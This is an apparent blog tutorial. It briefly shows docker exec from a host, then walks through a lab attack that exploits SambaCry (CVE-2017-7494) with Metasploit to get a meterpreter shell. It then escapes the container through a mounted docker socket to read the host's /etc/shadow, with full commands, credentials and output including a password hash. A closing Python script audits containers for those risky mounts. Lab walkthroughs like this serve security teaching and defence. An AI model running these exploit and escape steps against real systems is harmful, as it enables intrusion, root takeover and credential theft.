Execute the shell or program inside the Docker container on the host

To avoid repeatedly entering the Docker container to work in it, a series of commands inside the container can be run directly from the host machine.

Execute the "printer" executable in the /usr directory of the centos container (named centos-1) from the host machine (the author's host is Windows 7). The program prints "123".

C:\Users\Administrator>docker exec -it centos-1 /bin/bash -c "cd usr && ./printer"
123

success.

Additional knowledge: Using insecure deployment of Docker containers to gain host permissions

Preface

There are many ways to abuse containers and escape. This article will discuss the most basic one, which is to abuse the docker socket to escape the container and execute code as root on the host.

Experimental environment setup

Since we will be using containers, you must have docker installed.

Creating a network

First, we create a docker network where we will create the container:

docker network create pwnage

Start the vulnerable container

In this example, I will use a container affected by the SambaCry vulnerability (CVE-2017-7494). For more information about the vulnerability, see opsxcq/exploit-CVE-2017-7494.

This vulnerability allows remote code execution in the Samba server. We also mount the docker socket into the container, which is the insecure deployment that this example abuses.

docker run --rm -it \
    --name vulnerable \
    --network pwnage \
    -v '/var/run/docker.sock:/var/run/docker.sock' \
    vulnerables/cve-2017-7494

Start the attacker machine

After the lab environment is set up, we need to add the attacker's host to the network. There is an exploit available in the Samba Cry repository, but I will be using Metasploit here as it is easier to upload what I need.

I have built an image for this; just run the command below and everything will run as needed for the lab environment:

docker run --rm -it \
    --network pwnage \
    -v '/usr/bin/docker:/docker:ro' \
    strm/metasploit

After loading is complete, you will see the Metasploit console prompt.

Attack Exploitation

Information Collection

Information gathering is an essential part of any attack or test. So, let’s first ping the vulnerable container to check the current connectivity.

ping -c 2 vulnerable

If everything went well, you should see the following output.

msf5 > ping -c 2 vulnerable 
[*] exec: ping -c 2 vulnerable 
 
PING vulnerable (172.20.0.2) 56(84) bytes of data.
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=1 ttl=64 time=0.120 ms
64 bytes from vulnerable.pwnage (172.20.0.2): icmp_seq=2 ttl=64 time=0.097 ms
 
--- vulnerable ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1009ms
rtt min/avg/max/mdev = 0.097/0.108/0.120/0.015 ms

We then do a basic smb share enumeration:

use auxiliary/scanner/smb/smb_enumshares
set rhosts vulnerable
run

The output is as follows:

msf5 > use auxiliary/scanner/smb/smb_enumshares
msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts vulnerable
rhosts => vulnerable
msf5 auxiliary(scanner/smb/smb_enumshares) > run
 
[+] 172.20.0.2:139 - data - (DS) Data
[+] 172.20.0.2:139 - IPC$ - (I) IPC Service (Crying samba)
[*] vulnerable: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As you can see, there is a share named data in this samba server.

Get a shell

The next step is to run the exploit against the target to get a shell. In Metasploit, the exploit module is named is_known_pipename and is located at exploit/linux/samba/is_known_pipename.

Run the commands below to attack the target:

use exploit/linux/samba/is_known_pipename
set RHOST vulnerable
set RPORT 445
set payload linux/x64/meterpreter/bind_tcp
set TARGET 3
set SMB_FOLDER data
set SMBUser sambacry
set SMBPass nosambanocry
exploit

If everything goes well, you will get a meterpreter shell, as follows:

msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > set RHOST vulnerable
RHOST => vulnerable
msf5 exploit(linux/samba/is_known_pipename) > set RPORT 445
RPORT => 445
msf5 exploit(linux/samba/is_known_pipename) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf5 exploit(linux/samba/is_known_pipename) > set TARGET 3
TARGET => 3
msf5 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER data
SMB_FOLDER => data
msf5 exploit(linux/samba/is_known_pipename) > set SMBUser sambacry
SMBUser => sambacry
msf5 exploit(linux/samba/is_known_pipename) > set SMBPass nosambanocry
SMBPass => nosambanocry
msf5 exploit(linux/samba/is_known_pipename) > exploit
 
[*] vulnerable:445 - Using location \\vulnerable\data\ for the path
[*] vulnerable:445 - Retrieving the remote path of the share 'data'
[*] vulnerable:445 - Share 'data' has server-side path '/data
[*] vulnerable:445 - Uploaded payload to \\vulnerable\data\shyyEPPk.so
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using \\PIPE\/data/shyyEPPk.so...
[-] vulnerable:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] vulnerable:445 - Loading the payload from server-side path /data/shyyEPPk.so using /data/shyyEPPk.so...
[-] vulnerable:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Started bind TCP handler against vulnerable:4444
[*] Sending stage (816260 bytes) to vulnerable
 
meterpreter >

Privilege Escalation

We will escalate privileges by abusing the docker socket available inside the container. Since the Docker daemon runs as root on the host machine, anything that can talk to its socket effectively has root permissions there. We can abuse this to perform multiple actions. For example, the --privileged option provides many extended capabilities. The following explanation is taken from the official Docker documentation:

By default, Docker containers have no privileges, for example, you cannot start a container within a container. This is because by default containers cannot access any other devices. But by being "privileged", the container has the ability to access any other device. When the operator executes docker run --privileged, Docker will have access to all devices on the host. At the same time, Docker will also make some settings in apparmor or selinux so that the container can easily access devices running outside the container.

You can access devices using the --device option. But in this example, I will map the root file system (/) into the container and access it.

Since there is no docker client in this container, the next thing we need to do is to set up the docker client and its dependencies in the target container. You can do all of this by simply running the following commands.

upload /docker /docker
upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
chmod 777 /docker
chmod +x /docker

The output is as follows:

meterpreter > upload /docker /docker
[*] uploading : /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] Uploaded -1.00 B of 36.36 MiB (0.0%): /docker -> /docker
[*] uploaded : /docker -> /docker
meterpreter > upload /usr/lib/x86_64-linux-gnu/libltdl.so.7 /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploading: /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] Uploaded -1.00 B of 38.47 KiB (-0.0%): /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
[*] uploaded : /usr/lib/x86_64-linux-gnu/libltdl.so.7 -> /usr/lib/x86_64-linux-gnu/libltdl.so.7
meterpreter > chmod 777 /docker
meterpreter > chmod +x /docker
meterpreter >

Now, we can use docker to access the file system on the host machine.

execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"

Let's dump the hash of the local user. The output is as follows:

meterpreter > execute -f /docker -i -H -c -a "run --rm -v '/:/rootfs' debian:9.2 cat /rootfs/etc/shadow"
Process 113 created.
Channel 13 created.
root:$1$UFKdtFGw$qp29y1qGWit/vnvIG0uSr1:17488:0:99999:7:::
daemon:*:17488:0:99999:7:::
bin:*:17488:0:99999:7:::
sys:*:17488:0:99999:7:::
sync:*:17488:0:99999:7:::
games:*:17488:0:99999:7:::
man:*:17488:0:99999:7:::
lp:*:17488:0:99999:7:::
mail:*:17488:0:99999:7:::
news:*:17488:0:99999:7:::
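
From the defender's side, the two conditions this walkthrough depends on (the docker socket bind-mounted into a container, and the host root mapped in with -v '/:/rootfs') are visible in docker inspect output, as is --privileged. The following is an added example, not part of the original article: it audits inspect JSON for those three settings. The sample data and the container names rootfs-reader, priv and web are constructed for illustration.

```python
import json

# Constructed sample shaped like `docker inspect` output (not captured from a real host).
SAMPLE_INSPECT = json.dumps([
    {"Name": "/vulnerable", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                 "Destination": "/var/run/docker.sock", "RW": True}]},
    {"Name": "/rootfs-reader", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/rootfs", "RW": True}]},
    {"Name": "/priv", "HostConfig": {"Privileged": True}, "Mounts": []},
    {"Name": "/web", "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/site/_data",
                 "Destination": "/srv", "RW": False}]},
])

# Default socket locations; /var/run is usually a symlink to /run.
SOCKET_PATHS = {"/var/run/docker.sock", "/run/docker.sock"}


def audit_containers(inspect_json):
    """Return {container_name: [findings]} for containers exposing the host."""
    report = {}
    for c in json.loads(inspect_json):
        findings = []
        host_cfg = c.get("HostConfig") or {}
        if host_cfg.get("Privileged"):
            findings.append("privileged")
        for m in c.get("Mounts") or []:
            if m.get("Type") != "bind":
                continue
            # Normalise trailing slashes, but keep "/" itself intact.
            src = (m.get("Source") or "").rstrip("/") or "/"
            if src in SOCKET_PATHS:
                # Flagged even when RW is False: a read-only bind does not
                # stop a process from connecting to the socket and using the API.
                findings.append("docker-socket-mounted")
            elif src == "/":
                findings.append("host-root-mounted")
        if findings:
            report[c.get("Name", "?").lstrip("/")] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_containers(SAMPLE_INSPECT).items():
        print(f"{name}: {', '.join(findings)}")
```

On a real host, pass the function the output of docker inspect $(docker ps -q) instead of the constructed sample.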
